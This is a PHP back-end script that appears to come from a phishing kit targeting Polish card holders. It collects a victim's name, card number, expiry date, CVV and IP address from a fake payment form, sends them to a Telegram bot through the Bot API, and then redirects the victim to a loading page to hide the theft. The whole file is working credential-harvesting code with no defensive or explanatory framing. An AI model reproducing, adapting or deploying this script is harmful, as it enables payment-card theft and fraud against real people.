<?php
include '../token.php';

$zabi = getenv("REMOTE_ADDR");
$message = " [💳] #CCPL 🇵🇱 [💳]\n\n";
$message .= "»SMIA: " . $_POST['first_name'] . " " . $_POST['last_name'] . "\n";
$message .= "»CCN: ".$_POST['card_number']."\n";
$message .= "»EXP : ".$_POST['expiry_date']."\n";
$message .= "»CVV : ".$_POST['cvv']."\n";
$message .= "----------- IP Infos -------\n\n";
$message .= "IP       : $zabi\n";

$data = [
    'text' => $message,
    'chat_id' => $chat_id
];

file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data));

header("Location: ../loading.php");
exit();
?>
